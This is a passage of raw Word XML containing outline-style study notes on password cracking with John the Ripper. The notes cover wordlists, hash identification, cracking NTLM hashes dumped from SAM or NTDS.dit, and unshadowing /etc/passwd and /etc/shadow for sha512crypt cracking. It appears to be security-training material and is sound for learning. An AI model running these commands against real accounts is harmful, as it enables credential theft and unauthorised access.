        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A47E529" w14:textId="59C45F54" w:rsidR="003802EC" w:rsidRPr="0084205E" w:rsidRDefault="003802EC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SecLists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A06E9" w14:textId="3C2D5A5C" w:rsidR="003802EC" w:rsidRPr="0084205E" w:rsidRDefault="003802EC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F04B4C" w14:textId="58288873" w:rsidR="003802EC" w:rsidRPr="0084205E" w:rsidRDefault="003802EC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2607832A" w14:textId="0684F791" w:rsidR="003802EC" w:rsidRPr="0084205E" w:rsidRDefault="003802EC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking Basic Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361A1C7D" w14:textId="2E3B855A" w:rsidR="003802EC" w:rsidRPr="0084205E" w:rsidRDefault="003802EC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>John Basic Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C77AB82" w14:textId="588A1CBB" w:rsidR="003802EC" w:rsidRPr="0084205E" w:rsidRDefault="003802EC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john [options] [path to file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457D0A93" w14:textId="330D2A20" w:rsidR="003802EC" w:rsidRPr="0084205E" w:rsidRDefault="003802EC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Automatic Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B15D1BD" w14:textId="461A1D89" w:rsidR="003802EC" w:rsidRPr="0084205E" w:rsidRDefault="00E80BE6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john --wordlist</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>path to wordlist] [path to file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EBE25D" w14:textId="20E4AE02" w:rsidR="00E80BE6" w:rsidRPr="0084205E" w:rsidRDefault="00E80BE6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>auto-crack if hash type cannot be determined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF44C9A" w14:textId="4D2B5482" w:rsidR="00E80BE6" w:rsidRPr="0084205E" w:rsidRDefault="00E80BE6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Identifying Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1255E38F" w14:textId="395EBCD2" w:rsidR="00E80BE6" w:rsidRPr="0084205E" w:rsidRDefault="00E80BE6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>online hash identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E9909" w14:textId="42CBED95" w:rsidR="00EC36A3" w:rsidRPr="0084205E" w:rsidRDefault="00EC36A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>hash-identifier python tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24664060" w14:textId="4F7A91F7" w:rsidR="00EC36A3" w:rsidRPr="0084205E" w:rsidRDefault="00EC36A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01054148" w14:textId="555A5C1A" w:rsidR="00EC36A3" w:rsidRPr="0084205E" w:rsidRDefault="00EC36A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>launch with python3 hash-identifier.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068C37E0" w14:textId="785A349E" w:rsidR="00EC36A3" w:rsidRPr="0084205E" w:rsidRDefault="00EC36A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Format-Specific Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A17FD8" w14:textId="699DA486" w:rsidR="00EC36A3" w:rsidRPr="0084205E" w:rsidRDefault="00EC36A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john --format=[format] --wordlist</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>path to wordlist] [path to file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD8E95" w14:textId="2F89D1B3" w:rsidR="00972695" w:rsidRPr="0084205E" w:rsidRDefault="00972695" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking Windows Authentication Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553E996A" w14:textId="786DFDB4" w:rsidR="00972695" w:rsidRPr="0084205E" w:rsidRDefault="00DC42D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>authentication hashes are the hashed versions of passwords that are stored by Oss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2710008D" w14:textId="2F7E830B" w:rsidR="00DC42D8" w:rsidRPr="0084205E" w:rsidRDefault="00DC42D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NTHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23760F6B" w14:textId="7DEACAC3" w:rsidR="00DC42D8" w:rsidRPr="0084205E" w:rsidRDefault="00DC42D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>format that modern Windows OS machines store user and service passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33718B3C" w14:textId="32FAFC76" w:rsidR="00F24BFA" w:rsidRPr="0084205E" w:rsidRDefault="00F24BFA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>acquired by dumping SAM database on a windows machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B4190D" w14:textId="503EA794" w:rsidR="00F24BFA" w:rsidRPr="0084205E" w:rsidRDefault="00F24BFA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">use tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> or from AD database </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EAFAEDD" w14:textId="1BB2CAA8" w:rsidR="00F24BFA" w:rsidRPr="0084205E" w:rsidRDefault="00F24BFA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>can use pass the hash attack instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3515480D" w14:textId="2893B539" w:rsidR="00F24BFA" w:rsidRPr="0084205E" w:rsidRDefault="00F24BFA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NT flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C1955" w14:textId="4FA7AE3A" w:rsidR="00F24BFA" w:rsidRPr="0084205E" w:rsidRDefault="007D603F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED3BE36" w14:textId="2FB79F70" w:rsidR="007D603F" w:rsidRPr="0084205E" w:rsidRDefault="007D603F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unshadowing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326C5F62" w14:textId="1DA261D5" w:rsidR="007D603F" w:rsidRPr="0084205E" w:rsidRDefault="007D603F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> crack /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow passwords, must be combined with /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd file to understand data given</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FE0DF" w14:textId="1CD80C16" w:rsidR="007D603F" w:rsidRPr="0084205E" w:rsidRDefault="007D603F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>unshadow [path to passwd] [path to shadow]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275468F5" w14:textId="771ADE11" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>unshadow invokes the unshadow tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC633A7" w14:textId="1199226A" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>path that contains copy of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC9E711" w14:textId="62FFE864" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>path that contains copy of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E833852" w14:textId="7FCC5996" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D95D29D" w14:textId="283EBE3D" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">feed output from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>unshadow</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A14F3AB" w14:textId="3439A9C6" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>may need to specify format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2332E7D9" w14:textId="76A36AB4" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/rockyou.txt --format=sha512crypt unshadowed.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76418541" w14:textId="25E8E210" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Single Crack Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7235354F" w14:textId="54E01D37" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>John uses information provided in username to try and work out possible passwords heuristically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CDAF22" w14:textId="0478E304" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Word Mangling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635B0B7A" w14:textId="1C845F8B" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>John builds its own dictionary based on the information that it has been fed and uses a set of rules called mangling rules to define mutation of the initial word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D520907" w14:textId="45C999C1" w:rsidR="009316AD" w:rsidRPr="0084205E" w:rsidRDefault="009316AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">creates wordlist based </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>off of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> relevant factors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C65AB" w14:textId="60BE89B9" w:rsidR="006E0043" w:rsidRPr="0084205E" w:rsidRDefault="006E0043" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>assists in exploiting poor passwords</w:t>
      </w:r>
